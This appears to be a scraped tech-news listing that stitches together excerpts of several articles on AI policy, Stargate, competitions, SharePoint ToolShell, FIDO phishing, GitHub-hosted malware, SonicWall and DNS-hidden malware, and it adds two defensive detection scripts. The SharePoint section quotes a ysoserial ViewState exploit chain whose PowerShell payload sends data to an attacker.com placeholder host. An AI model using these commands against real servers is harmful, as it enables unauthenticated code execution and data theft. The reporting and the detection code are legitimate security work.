Biz & IT

White House unveils sweeping plan to “win” global AI race through deregulation

Trump’s plan was not welcomed by everyone. J.B. Branch, Big Tech accountability advocate for Public Citizen, in a statement provided to Ars, criticized Trump as giving “sweetheart deals” to tech companies that would cause “electricity bills to rise to subsidize discounted power for massive AI data centers.”

Infrastructure demands and energy requirements

Trump’s new AI plan tackles infrastructure head-on, stating that “AI is the first digital service in modern life that challenges America to build vastly greater energy generation than we have today.” To meet this demand, it proposes streamlining environmental permitting for data centers through new National Environmental Policy Act (NEPA) exemptions, making federal lands available for construction and modernizing the power grid—all while explicitly rejecting “radical climate dogma and bureaucratic red tape.”

The document embraces what it calls a “Build, Baby, Build!” approach—echoing a Trump campaign slogan—and promises to restore semiconductor manufacturing through the CHIPS Program Office, though stripped of “extraneous policy requirements.”

On the technology front, the plan directs Commerce to revise NIST’s AI Risk Management Framework to “eliminate references to misinformation, Diversity, Equity, and Inclusion, and climate change.” Federal procurement would favor AI developers whose systems are “objective and free from top-down ideological bias.” The document strongly backs open source AI models and calls for exporting American AI technology to allies while blocking administration-labeled adversaries like China.

Security proposals include high-security military data centers and warnings that advanced AI systems “may pose novel national security risks” in cyberattacks and weapons development.

Critics respond with “People’s AI Action Plan”

Before the White House unveiled its plan, more than 90 organizations launched a competing “People’s AI Action Plan” on Tuesday, characterizing the Trump administration’s approach as “a massive handout to the tech industry” that prioritizes corporate interests over public welfare. The coalition includes labor unions, environmental justice groups, and consumer protection nonprofits.

OpenAI and partners are building a massive AI data center in Texas

Stargate moves forward despite early skepticism

When OpenAI announced Stargate in January, critics questioned whether the company could deliver on its ambitious $500 billion funding promise. Trump ally and frequent Altman foe Elon Musk wrote on X that “They don’t actually have the money,” claiming that “SoftBank has well under $10B secured.”

Tech writer and frequent OpenAI critic Ed Zitron raised concerns about OpenAI’s financial position, noting the company’s $5 billion in losses in 2024. “This company loses $5bn+ a year! So what, they raise $19bn for Stargate, then what, another $10bn just to be able to survive?” Zitron wrote on Bluesky at the time.

Six months later, OpenAI’s Abilene data center has moved from construction to partial operation. Oracle began delivering Nvidia GB200 racks to the facility last month, and OpenAI reports it has started running early training and inference workloads to support what it calls “next-generation frontier research.”

Despite the White House announcement with President Trump in January, the Stargate concept dates back to March 2024, when Microsoft and OpenAI partnered on a $100 billion supercomputer as part of a five-phase plan. Over time, the plan evolved into its current form as a partnership with Oracle, SoftBank, and CoreWeave.

“Stargate is an ambitious undertaking designed to meet the historic opportunity in front of us,” writes OpenAI in the press release announcing the latest deal. “That opportunity is now coming to life through strong support from partners, governments, and investors worldwide—including important leadership from the White House, which has recognized the critical role AI infrastructure will play in driving innovation, economic growth, and national competitiveness.”

What to know about ToolShell, the SharePoint threat under mass exploitation

Microsoft fixed the vulnerability pair—CVE-2025-49706 and CVE-2025-49704—two weeks ago as part of the company’s monthly update release. As the world learned over the weekend, the patches were incomplete, a lapse that opened organizations around the world to the new attacks.

Q: What sorts of malicious things are attackers doing with these newer ToolShell exploits?

A: According to numerous technical analyses, the attackers first infect vulnerable systems with a webshell-based backdoor that gains access to some of the most sensitive parts of a SharePoint Server. From there, the webshell extracts tokens and other credentials that allow the attackers to gain administrative privileges, even when systems are protected by multifactor authentication and single sign-on. Once inside, the attackers exfiltrate sensitive data and deploy additional backdoors that provide persistent access for future use.

For those who want more technical details, the opening volley in the attack is POST Web requests the attackers send to the ToolPane endpoint. The requests look like this:

(Screenshot of the POST requests to the ToolPane endpoint, not reproduced here. Credit: Akamai)

Microsoft said these requests upload a malicious script named spinstall0.aspx, or alternatively spinstall.aspx, spinstall1.aspx, spinstall2.aspx, and so on. The script contains commands for retrieving a SharePoint server’s encrypted MachineKey configuration and returning the decrypted results to the attacker through a GET request.

Q: I maintain an on-premises SharePoint server. What should I do?

A: In short, drop whatever else you were doing and take time to carefully inspect your system. The first thing to look for is whether it has received the emergency patches Microsoft released Saturday. Install the patch immediately if it hasn’t already been done.

Patching the vulnerability is only the first step, since systems infected through it show few or no signs of compromise. The next step is to pore through system event logs in search of indicators of compromise. These indicators can be found in numerous write-ups, including those from Microsoft and Eye Security (at the links above), the US Cybersecurity and Infrastructure Security Agency, and security firms SentinelOne, Akamai, Tenable, and Palo Alto Networks.
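A log-hunting script for the sequence the answer describes (a POST to the ToolPane endpoint, then a request for a spinstall*.aspx file from the same client), added here as an example; it is not taken from Microsoft's, Akamai's or any other vendor's write-up. The ToolPane path under /_layouts/15/, the W3C log fields and the sample log lines are assumptions constructed for the example.

```python
"""Hunt IIS W3C logs for the ToolShell sequence: a POST to the ToolPane
endpoint followed, from the same client, by a request for spinstall*.aspx.
Added example; the endpoint path and the sample traffic are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: the "ToolPane endpoint" is served under /_layouts/15/ (or /16/).
TOOLPANE_RE = re.compile(r"/_layouts/1[56]/toolpane\.aspx$", re.I)
# The dropped script names the article lists: spinstall.aspx, spinstall0.aspx, ...
SPINSTALL_RE = re.compile(r"/spinstall\d*\.aspx$", re.I)

# Constructed sample log in IIS W3C extended format (not real traffic).
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-07-19 08:14:02 10.1.2.3 GET /_layouts/15/start.aspx - 203.0.113.7 200
2025-07-19 08:14:05 10.1.2.3 POST /_layouts/15/ToolPane.aspx - 203.0.113.7 200
2025-07-19 08:14:09 10.1.2.3 GET /_layouts/15/spinstall0.aspx - 203.0.113.7 200
2025-07-19 09:30:11 10.1.2.3 GET /_layouts/15/spinstall.aspx - 198.51.100.9 404
2025-07-19 09:31:00 10.1.2.3 POST /_layouts/15/ToolPane.aspx - 192.0.2.44 200
2025-07-19 11:00:00 10.1.2.3 GET /_layouts/15/ToolPane.aspx - 192.0.2.44 200
"""


def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated line: skip rather than guess
        row = dict(zip(fields, values))
        row["ts"] = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def find_toolshell_activity(rows, window=timedelta(minutes=15)):
    """Return findings per client IP, ordered high -> medium -> low severity."""
    by_client = defaultdict(list)
    for row in rows:
        by_client[row["c-ip"]].append(row)

    findings = []
    for client, reqs in by_client.items():
        reqs.sort(key=lambda r: r["ts"])
        posts = [r for r in reqs
                 if r["cs-method"].upper() == "POST" and TOOLPANE_RE.search(r["cs-uri-stem"])]
        drops = [r for r in reqs if SPINSTALL_RE.search(r["cs-uri-stem"])]
        explained = set()
        for post in posts:
            follow = [d for d in drops if post["ts"] <= d["ts"] <= post["ts"] + window]
            if follow:
                explained.update(id(d) for d in follow)
                findings.append({"client": client, "severity": "high", "first_seen": post["ts"],
                                 "reason": "ToolPane POST followed by spinstall request",
                                 "paths": [d["cs-uri-stem"] for d in follow]})
            else:
                findings.append({"client": client, "severity": "low", "first_seen": post["ts"],
                                 "reason": "ToolPane POST without observed follow-up",
                                 "paths": [post["cs-uri-stem"]]})
        # Any request for spinstall*.aspx is suspicious on its own, even when it 404s:
        # the POST may have hit another front end or fallen in an unlogged period.
        for drop in drops:
            if id(drop) not in explained:
                findings.append({"client": client, "severity": "medium", "first_seen": drop["ts"],
                                 "reason": "request for spinstall*.aspx",
                                 "paths": [drop["cs-uri-stem"]]})
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: (order[f["severity"]], f["first_seen"]))


if __name__ == "__main__":
    for f in find_toolshell_activity(parse_w3c(SAMPLE_IIS_LOG)):
        print(f["severity"].upper(), f["client"], f["reason"], f["paths"])
```

Run it over the real logs from every SharePoint front end, since a load balancer can put the POST and the follow-up GET on different servers.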

A power utility is reporting suspected pot growers to cops. EFF says that’s illegal.

In May 2020, Sacramento, California, resident Alfonso Nguyen was alarmed to find two Sacramento County Sheriff’s deputies at his door, accusing him of illegally growing cannabis and demanding entry into his home. When Nguyen refused the search and denied the allegation, one deputy allegedly called him a liar and threatened to arrest him.

That same year, deputies from the same department, with their guns drawn and bullhorns and sirens sounding, fanned out around the home of Brian Decker, another Sacramento resident. The officers forced Decker to walk backward out of his home in only his underwear around 7 am while his neighbors watched. The deputies said that he, too, was under suspicion of illegally growing cannabis.

Invasion of the privacy snatchers

According to a motion the Electronic Frontier Foundation filed in Sacramento Superior Court last week, Nguyen and Decker are only two of more than 33,000 Sacramento-area people who have been flagged to the sheriff’s department by the Sacramento Municipal Utility District, the electricity provider for the region. SMUD called the customers out for using what it and department investigators said were suspiciously high amounts of electricity indicative of illegal cannabis farming.

The EFF, citing investigator and SMUD records, said the utility unilaterally analyzes customers’ electricity usage in “painstakingly” detailed increments of every 15 minutes. When analysts identify patterns they deem likely signs of illegal grows, they notify sheriff’s investigators. The EFF said the practice violates privacy protections guaranteed by the federal and California governments and is seeking a court order barring the warrantless disclosures.

“SMUD’s disclosures invade the privacy of customers’ homes,” EFF attorneys wrote in a court document in support of last week’s motion. “The whole exercise is the digital equivalent of a door-to-door search of an entire city. The home lies at the ‘core’ of constitutional privacy protection.”

Contrary to claims by SMUD and sheriff’s investigators that the flags are accurate, the EFF cited multiple examples where they have been wrong. In Decker’s case, for instance, SMUD analysts allegedly told investigators that his electricity usage indicated “4 to 5 grow lights are being used [at his home] from 7pm to 7am.” In actuality, the EFF said, someone in the home was mining cryptocurrency. Nguyen’s electricity consumption was the result of a spinal injury that requires him to use an electric wheelchair and special HVAC equipment to maintain his body temperature.

SharePoint vulnerability with 9.8 severity rating under exploit across globe

The researchers wrote:

Now, with the ToolShell chain (CVE-2025-49706 + CVE-2025-49704), attackers appear to extract the ValidationKey directly from memory or configuration. Once this cryptographic material is leaked, the attacker can craft fully valid, signed __VIEWSTATE payloads using a tool called ysoserial as shown in the example below.

Using ysoserial the attacker can generate its own valid SharePoint tokens for RCE.

# command to get the  via any public available SharePoint page, like start.aspx
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="K[^"]+'

# example malicious Powershell viewstate payload that the adversary can utilize as RCE to list a dir
ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell -nop -c "dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS' | %  Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) "" --generator="" --validationkey="" --validationalg="" --islegacy --minify

# finally, by adding the generated token to any request, the command is executed (RCE)
curl http://target/_layouts/15/success.aspx?__VIEWSTATE=

These payloads can embed any malicious commands and are accepted by the server as trusted input, completing the RCE chain without requiring credentials. This mirrors the design weakness exploited in 2021, but now packaged into a modern zero-day chain with automatic shell drop, full persistence, and zero authentication.

Patching is only the start

The attackers are using the capability to steal SharePoint ASP.NET machine keys, which allow the attackers to stage hacks of additional infrastructure at a later time. That means that patching alone provides no assurance that attackers have been driven out of a compromised system. Instead, affected organizations must rotate SharePoint ASP.NET machine keys and restart the IIS web server running on top.

According to The Washington Post, at least two federal agencies have found that servers inside their networks were breached in the ongoing attacks.

The Eye Security post provides technical indicators that admins can use to determine if their systems have been targeted in the attacks. It also provides a variety of measures vulnerable organizations can take to harden their systems against the activity.

In a post on Sunday, the US Cybersecurity and Infrastructure Security Agency confirmed the attacks and their use of ToolShell. The post went on to provide its own list of security measures.

OpenAI jumps gun on International Math Olympiad gold medal announcement

The early announcement has prompted Google DeepMind, which had prepared its own IMO results for the agreed-upon date, to move up its own IMO-related announcement to later today. Harmonic plans to share its results as originally scheduled on July 28.

In response to the controversy, OpenAI research scientist Noam Brown posted on X, “We weren’t in touch with IMO. I spoke with one organizer before the post to let him know. He requested we wait until after the closing ceremony ends to respect the kids, and we did.”

However, an IMO coordinator told X user Mikhail Samin that OpenAI actually announced before the closing ceremony, contradicting Brown’s claim. The coordinator called OpenAI’s actions “rude and inappropriate,” noting that OpenAI “wasn’t one of the AI companies that cooperated with the IMO on testing their models.”

Hard math since 1959

The International Mathematical Olympiad, which has been running since 1959, represents one of the most challenging tests of mathematical reasoning. More than 100 countries send six participants each, with contestants facing six proof-based problems across two 4.5-hour sessions. The problems typically require deep mathematical insight and creativity rather than raw computational power. You can see the exact problems in the 2025 Olympiad posted online.

For example, problem one asks students to imagine a triangular grid of dots (like a triangular pegboard) and figure out how to cover all the dots using exactly n straight lines. The twist is that some lines are called “sunny”—these are the lines that don’t run horizontally, vertically, or diagonally at a 45º angle. The challenge is to prove that no matter how big your triangle is, you can only ever create patterns with exactly 0, 1, or 3 sunny lines—never 2, never 4, never any other number.

The timing of the OpenAI results surprised some prediction markets, which had assigned around an 18 percent probability to any AI system winning IMO gold by 2025. However, depending on what Google says this afternoon (and what others like Harmonic may release on July 28), OpenAI may not be the only AI company to have achieved these unexpected results.

Exhausted man defeats AI model in world coding championship

While Dębiak won 500,000 yen and survived his ordeal better than the legendary steel driver, the AtCoder World Tour Finals pushes humans and AI models to their limits through complex optimization challenges that have no perfect solution—only incrementally better ones.

Coding marathon tests human endurance against AI efficiency

The AtCoder World Tour Finals represents one of competitive programming’s most exclusive events, inviting only the top 12 programmers worldwide based on their performance throughout the previous year. The Heuristic division focuses on “NP-hard” optimization problems. In programming, heuristics are problem-solving techniques that find good-enough solutions through shortcuts and educated guesses when perfect answers would take too long to calculate.

All competitors, including OpenAI, were limited to identical hardware provided by AtCoder, ensuring a level playing field between human and AI contestants. According to the contest rules, participants could use any programming language available on AtCoder, with no penalty for resubmission but a mandatory five-minute wait between submissions.

Final leaderboard results for the 2025 AtCoder World Finals Heuristic Contest, showing Dębiak (as “Psyho”) on top. Credit: AtCoder

The final contest results showed Psyho finishing with a score of 1,812,272,558,909 points, while OpenAI’s model (listed as “OpenAIAHC”) scored 1,654,675,725,406 points—a margin of roughly 9.5 percent. OpenAI’s artificial entrant, a custom simulated reasoning model similar to o3, placed second overall, ahead of 10 other human programmers who had qualified through year-long rankings.

OpenAI characterized the second-place finish as a milestone for AI models in competitive programming. “Models like o3 rank among the top-100 in coding/math contests, but as far as we know, this is the first top-3 placement in a premier coding/math contest,” a company spokesperson said in an email to Ars Technica. “Events like AtCoder give us a way to test how well our models can reason strategically, plan over long time horizons, and improve solutions through trial and error—just like a human would.”

Phishers have found a way to downgrade—not bypass—FIDO MFA

Researchers recently reported encountering a phishing attack in the wild that bypasses a multifactor authentication scheme based on FIDO (Fast Identity Online), the industry-wide standard being adopted by thousands of sites and enterprises.

If true, the attack, reported in a blog post Thursday by security firm Expel, would be huge news, since FIDO is widely regarded as being immune to credential phishing attacks. After analyzing the Expel write-up, I’m confident that the attack doesn’t bypass FIDO protections, at least not in the sense that the word “bypass” is commonly used in security circles. Rather, the attack downgrades the MFA process to a weaker, non-FIDO-based process. As such, the attack is better described as a FIDO downgrade attack. More about that shortly. For now, let’s describe what Expel researchers reported.

Abusing cross-device sign-ins

Expel said the “novel attack technique” begins with an email that links to a fake login page from Okta, a widely used authentication provider. It prompts visitors to enter their valid user name and password. People who take the bait have now helped the attack group, which Expel said is named PoisonSeed, clear the first big hurdle in gaining unauthorized access to the Okta account.

The FIDO spec was designed to mitigate precisely these sorts of scenarios by requiring users to provide an additional factor of authentication in the form of a security key, which can be a passkey or a physical security key, such as a smartphone or a dedicated device such as a YubiKey. For this additional step, the passkey must use a unique cryptographic key embedded in the device to sign a challenge that the site (Okta, in this case) sends to the browser logging in.

One of the ways a user can provide this additional factor is by using a cross-device sign-in feature. If there is no passkey on the device being used to log in, a user can use a passkey for that site that’s already resident on a different device, which in most cases will be a phone. In these cases, the site being logged into displays a QR code. The user scans the QR code with the phone, and the FIDO MFA process then proceeds as normal.

GitHub abused to distribute payloads on behalf of malware-as-a-service

Researchers from Cisco’s Talos security team have uncovered a malware-as-a-service operator that used public GitHub accounts as a channel for distributing an assortment of malicious software to targets.

The use of GitHub gave the malware-as-a-service (MaaS) a reliable and easy-to-use platform that’s greenlit in many enterprise networks that rely on the code repository for the software they develop. GitHub removed the three accounts that hosted the malicious payloads shortly after being notified by Talos.

“In addition to being an easy means of file hosting, downloading files from a GitHub repository may bypass Web filtering that is not configured to block the GitHub domain,” Talos researchers Chris Neal and Craig Jackson wrote Thursday. “While some organizations can block GitHub in their environment to curb the use of open-source offensive tooling and other malware, many organizations with software development teams require GitHub access in some capacity. In these environments, a malicious GitHub download may be difficult to differentiate from regular web traffic.”

Emmenhtal, meet Amadey

The campaign, which Talos said had been ongoing since February, used a previously known malware loader tracked under names including Emmenhtal and PeakLight. Researchers from security firm Palo Alto Networks and Ukraine’s major state cyber agency SSSCIP had already documented the use of Emmenhtal in a separate campaign that embedded the loader into malicious emails to distribute malware to Ukrainian entities. Talos found the same Emmenhtal variant in the MaaS operation, only this time the loader was distributed through GitHub.

The campaign using GitHub differed from the one targeting Ukrainian entities in another key way. Whereas the final payload in the Ukrainian campaign was a malicious backdoor known as SmokeLoader, the GitHub campaign installed Amadey, a separate, previously known malware platform. Amadey was first seen in 2018 and was initially used to assemble botnets. Talos said the primary function of Amadey is to collect system information from infected devices and download a set of secondary payloads that are customized to each device’s characteristics and to the specific purpose of a given campaign.

More VMware cloud partners axed as Broadcom launches new invite-only program

In response to the white-label program ending, a Reddit user who claimed that their organization spent 300,000 pounds (about $402,500) a year on licensing through a VMware white-label partner said:

I now have 6 months to design / procure / build a new multi region service provider virtualisation platform to support millions in revenue and an additional 12 months to migrate all our VMware clients.

I’m just astonished.

In a statement to The Register, Broadcom encouraged CSPs cut from VMware’s channel to work with authorized partners to “ensure a smooth transition for customers who seek to renew a service at the end of their current term,” but it offered no incentive or resources.

“Stronger execution”

News of additional partner cuts follows last month’s debut of VMware Cloud Foundation (VCF) 9.0. The blog post by VMware partner Interactive posited that Broadcom is paring down its CSP partner program in relation to VCF 9.0, which it said “underpins a small number [of] hyperscale private cloud platforms in each region.”

In a statement to The Register explaining the changes, Broadcom said:

Broadcom’s strategy since closing the VMware acquisition has been to drive simplification, consistency, and innovation across the VMware Go To Market ecosystem, including VMware Cloud Service Providers (VCSPs).

Recent changes to this ecosystem are consistent with this strategy. Broadcom is focusing more and going deeper with the VCSPs who have demonstrated commitment to their cloud services built on VMware. This will enable us to deliver greater value, stronger execution, and a more streamlined experience for Broadcom’s VMware customers of all sizes and enable a truly competitive offering to the hyperscalers through our CSPs.

Broadcom hasn’t shared how many partners it has shed through previous VMware channel changes. Last month, it cut members of the VMware reseller program’s lowest tier and claimed that most affected partners were inactive.

When Broadcom dropped those resellers last month, there was concern that its partner reductions were too extreme. At the time, Gartner VP analyst Michael Warrilow, for example, told The Register: “Broadcom seem intent on destroying what was one of the most successful partner ecosystems in the industry.” Sumit Bhatia, co-author of the book Navigating VMware Turmoil in the Broadcom Era, told Ars Technica that he expected the partner cuts to result in higher pricing for VMware customers.

As Broadcom continues to whittle away at VMware’s remaining partner base, the impacts of a smaller partner program will become harder to ignore, particularly for small-to-medium-sized businesses. The change aligns with the perception that Broadcom is mostly interested in conducting VMware business with large customers, despite repeated claims that its VMware changes benefit “customers of all sizes.”

Google finds custom backdoor being installed on SonicWall network devices

Researchers from the Google Threat Intelligence Group said that hackers are compromising SonicWall Secure Mobile Access (SMA) appliances, which sit at the edge of enterprise networks and manage and secure access by mobile devices.

The targeted devices are end of life, meaning they no longer receive regular updates for stability and security. Despite that status, many organizations continue to rely on them. That has left them prime targets for UNC6148, the name Google has given to the unknown hacking group.

“GTIG recommends that all organizations with SMA appliances perform analysis to determine if they have been compromised,” a report published Wednesday said, using the abbreviation for Google Threat Intelligence Group. “Organizations should acquire disk images for forensic analysis to avoid interference from the rootkit anti-forensic capabilities. Organizations may need to engage with SonicWall to capture disk images from physical appliances.”

Lacking specifics

Many key details remain unknown. For one thing, the attacks are exploiting leaked local administrator credentials on the targeted devices, and so far, no one knows how the credentials were obtained. Nor is it known what vulnerabilities UNC6148 is exploiting, or precisely what the attackers are doing after they take control of a device.

The lack of details is largely the result of the functioning of Overstep, the name of the custom backdoor malware UNC6148 installs after initially compromising the devices. Overstep allows the attackers to selectively remove log entries, a technique that is hindering forensic investigation. Wednesday’s report also posits that the attackers may be armed with a zero-day exploit, meaning one that targets a vulnerability that is currently publicly unknown. Possible vulnerabilities UNC6148 may be exploiting include:

  • CVE-2021-20038: An unauthenticated remote code execution made possible by a memory corruption vulnerability.
  • CVE-2024-38475: An unauthenticated path traversal vulnerability in Apache HTTP Server, which is present in the SMA 100. It can be exploited to extract two separate SQLite databases that store user account credentials, session tokens, and seed values for generating one-time passwords.
  • CVE-2021-20035: An authenticated remote code execution vulnerability. Security firm Arctic Wolf and SonicWall reported in April that this vulnerability was under active exploitation.
  • CVE-2021-20039: An authenticated remote code execution vulnerability. There have been reports that this vulnerability was under active exploitation to install ransomware in 2024.
  • CVE-2025-32819: An authenticated file deletion vulnerability that can be exploited to cause a targeted device to reset the built-in administrator credentials, allowing attackers to gain administrator access.

Hackers exploit a blind spot by hiding malware inside DNS records

Hackers are stashing malware in a place that’s largely out of the reach of most defenses—inside domain name system (DNS) records that map domain names to their corresponding numerical IP addresses.

The practice allows malicious scripts and early-stage malware to fetch binary files without having to download them from suspicious sites or attach them to emails, where they frequently get quarantined by antivirus software. That’s because traffic for DNS lookups often goes largely unmonitored by many security tools. Whereas web and email traffic is often closely scrutinized, DNS traffic largely represents a blind spot for such defenses.

A strange and enchanting place

Researchers from DomainTools on Tuesday said they recently spotted the trick being used to host a malicious binary for Joke Screenmate, a strain of nuisance malware that interferes with normal and safe functions of a computer. The file was converted from binary format into hexadecimal, an encoding scheme that uses the digits 0 through 9 and the letters A through F to represent binary values in a compact combination of characters.

The hexadecimal representation was then broken up into hundreds of chunks. Each chunk was stashed inside the DNS record of a different subdomain of the domain whitetreecollective[.]com. Specifically, the chunks were placed inside the TXT record, a portion of a DNS record capable of storing any arbitrary text. TXT records are often used to prove ownership of a site when setting up services like Google Workspace.

An attacker who managed to get a toehold into a protected network could then retrieve each chunk using an innocuous-looking series of DNS requests, reassemble the chunks, and convert them back into binary format. The technique allows the malware to be retrieved through traffic that can be hard to monitor closely. As encrypted forms of DNS lookups—known as DoH (DNS over HTTPS) and DoT (DNS over TLS)—gain adoption, the difficulty will likely grow.
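Detection logic for the pattern described above (many subdomains of one parent domain, each answered with a long hex-only TXT string), added here as an example and not part of DomainTools’ report. The resolver log format, the thresholds and the sample lines, including the example.test and cdn.test names, are constructed assumptions.

```python
"""Flag DNS TXT activity that matches chunked-hex payload staging: many
subdomains of one parent, each answered with a long string made only of
hexadecimal characters.  Added example; the log format is an assumption
and the thresholds should be tuned per environment."""
import re
from collections import defaultdict

HEX_ONLY = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample resolver log (not from DomainTools' report).
# Fields: timestamp client qname qtype rdata
SAMPLE_DNS_LOG = """\
2025-07-15T10:00:01Z 10.0.0.5 c1.payload.example.test TXT "4d5a90000300000004000000ffff0000b8000000000000004000000000000000"
2025-07-15T10:00:02Z 10.0.0.5 c2.payload.example.test TXT "0000000000000000000000000000000000000000000000008000000000000000"
2025-07-15T10:00:03Z 10.0.0.5 c3.payload.example.test TXT "0e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f"
2025-07-15T10:00:04Z 10.0.0.5 c4.payload.example.test TXT "742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000"
2025-07-15T10:00:05Z 10.0.0.5 c5.payload.example.test TXT "504500006486040000000000000000000000000000000000f00022000b020e00"
2025-07-15T10:00:06Z 10.0.0.5 verify.example.test TXT "a1b2c3d4e5f60718"
2025-07-15T10:00:07Z 10.0.0.7 example.test TXT "v=spf1 include:_spf.example.test -all"
2025-07-15T10:00:08Z 10.0.0.7 _dmarc.example.test TXT "v=DMARC1; p=reject"
2025-07-15T10:00:09Z 10.0.0.9 www.example.test A 192.0.2.10
2025-07-15T10:00:10Z 10.0.0.9 a.cdn.test TXT "00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff"
2025-07-15T10:00:11Z 10.0.0.9 b.cdn.test TXT "ffeeddccbbaa99887766554433221100ffeeddccbbaa99887766554433221100"
"""


def parent_domain(qname, levels=2):
    """Collapse a query name to its parent: the last `levels` labels."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-levels:])


def parse_line(line):
    """Split one log line; TXT rdata may contain spaces, so split at most 4 times."""
    parts = line.split(maxsplit=4)
    if len(parts) < 5:
        return None
    ts, client, qname, qtype, rdata = parts
    return {"ts": ts, "client": client, "qname": qname.lower(),
            "qtype": qtype.upper(), "rdata": rdata.strip().strip('"')}


def find_hex_chunk_domains(lines, min_chunks=4, min_hex_len=32):
    """Return parents that received >= min_chunks long, hex-only TXT answers."""
    stats = defaultdict(lambda: {"subdomains": set(), "clients": set(),
                                 "hex_txt_answers": 0, "decoded_bytes": 0,
                                 "looks_like_pe": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["qtype"] != "TXT":
            continue
        rdata = rec["rdata"]
        # Legitimate TXT data (SPF, DMARC, short verification tokens) fails one of these.
        if len(rdata) < min_hex_len or len(rdata) % 2 or not HEX_ONLY.match(rdata):
            continue
        s = stats[parent_domain(rec["qname"])]
        s["subdomains"].add(rec["qname"])
        s["clients"].add(rec["client"])
        s["hex_txt_answers"] += 1
        s["decoded_bytes"] += len(rdata) // 2
        if rdata.lower().startswith("4d5a"):  # "MZ": chunk starts like a Windows executable
            s["looks_like_pe"] = True
    return {parent: {"subdomains": len(s["subdomains"]), "clients": sorted(s["clients"]),
                     "hex_txt_answers": s["hex_txt_answers"],
                     "decoded_bytes": s["decoded_bytes"], "looks_like_pe": s["looks_like_pe"]}
            for parent, s in stats.items() if s["hex_txt_answers"] >= min_chunks}


if __name__ == "__main__":
    for parent, info in find_hex_chunk_domains(SAMPLE_DNS_LOG.splitlines()).items():
        print(parent, info)
```

Because the lookups may be wrapped in DoH or DoT, the log source has to be the resolver the hosts are forced to use (or endpoint telemetry), not a passive tap on port 53.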